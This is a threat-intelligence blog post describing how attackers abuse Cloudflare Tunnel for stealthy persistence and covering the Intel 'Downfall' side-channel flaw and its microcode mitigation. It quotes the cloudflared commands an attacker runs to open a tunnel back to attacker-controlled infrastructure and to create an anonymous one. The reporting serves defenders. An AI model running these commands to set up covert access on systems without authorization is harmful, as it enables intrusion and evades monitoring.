7 min read
Cyber Threat Intelligence Briefing - September 11, 2023
Welcome back to another week of Cyber Threat Intelligence (CTI). This week's report highlights Cisco devices being targeted by ransomware gangs, a...
3 min read
The PacketWatch Intelligence Team
:
Aug 14, 2023 3:29:14 PM
Welcome back to another week of Cyber Threat Intelligence (CTI). This week's report highlights how threat actors are abusing the legitimate Cloudflare service ‘Cloudflare Tunnel’ to establish persistence and obfuscate activity and a new side-channel attack ‘Downfall’ disclosed for Intel processors.
New research from Guidepoint Security highlights a new technique that abuses Cloudflare Tunnel (a.k.a. Cloudflared), which threat actors are leveraging for stealth and maintaining persistent access within a target network.
Per Cloudflare's documentation, it provides a secure way to connect resources to Cloudflare without a publicly routable IP address. It does not send traffic to an external IP, instead, the 'cloudflared' daemon creates outbound-only connections to the Cloudflare global network. The Tunnel supports connections to HTTP servers, SSH servers, remote desktops, and other protocols.
Threat actor configures the Tunnel environment on their Cloudflare account.
Threat actor gains access to the victim's machine via traditional methods (i.e. phishing, social engineering, remote exploit)
Threat actor issues just a single command on the victim machine, establishing a persistent tunnel back to the attacker-controlled Cloudflare environment.
The only parameter that needs to be passed at the command line is the associated token with the tunnel the threat actor created.
cloudflared tunnel run --token <token from Cloudflare>
This 'private network' configuration is not updated in the configuration output on the command line, effectively hiding the configuration from defenders.
This allows the threat actor to interact with any device on the 'private network'.
Cloudflare Tunnels also allows for entire CIDR ranges to have access to the tunnel.
It should also be noted that Cloudflare has a TryCloudflare feature, which allows for users to create a single-use cloudflared tunnel. This setup process would allow a threat actor to create a tunnel without providing identifying information to Cloudflare for attribution.
cloudflared tunnel --url http://localhost:<port>
While the tunnel itself provides a great layer of obfuscation for the threat actor, several indicators can be monitored for this type of activity:
Last week, security researchers at Google published research for a new side-channel attack against certain Intel CPU architectures. The vulnerability is tracked as CVE-2022-40982 and is nicknamed 'Downfall'. If exploited under the correct conditions, the vulnerability can lead to disclosure of passwords, cryptographic keys, and other sensitive information.
This vulnerability affects Intel Server CPUs, from the 6th (Skylake) generation to 11th (Tiger Lake) generation processors. A full list of vulnerable CPU models can be found on Intel's site here.
For this vulnerability to be successfully exploited, the threat actor needs to be sharing the same physical processor core. This scenario is most common in cloud computing. The threat actor would need to download a malicious payload and execute the payload on the same physical processor as the victim. Given the specific conditions that need to be met to carry out the attack, the overall risk is considered to be low. However, proof-of-concept code has been published to Github, as well as detailed research and documentation of the vulnerability, making potential public exploitation a possibility.
Intel has a microcode update that can mitigate the vulnerability, which can be found here. Additional information from Intel regarding the vulnerability can be found here.
It should be noted that applying this update can result in up to 50% performance degradation. Organizations must decide if negating the risk of exploitation is worth the performance penalty of the CPU.
PacketWatch publishes this report and other cybersecurity threat intel to the security community for free via our blog. If you are interested in personalized threat intel, contact us today to learn about our enterprise threat intelligence services.
Kindly be advised that the information contained in this article is presented with no final evaluation and should be considered raw data. The sole purpose of this information is to provide situational awareness based on the currently available knowledge. We recommend exercising caution and conducting further research as necessary before making any decisions based on this information.
7 min read
Welcome back to another week of Cyber Threat Intelligence (CTI). This week's report highlights Cisco devices being targeted by ransomware gangs, a...
5 min read
Welcome back to another week of Cyber Threat Intelligence (CTI). This week's report highlights new post-quantum cryptographic (PQC) standards, the...
5 min read
Welcome back to another week of Cyber Threat Intelligence (CTI). This week's report highlights how threat actors are abusing the legitimate...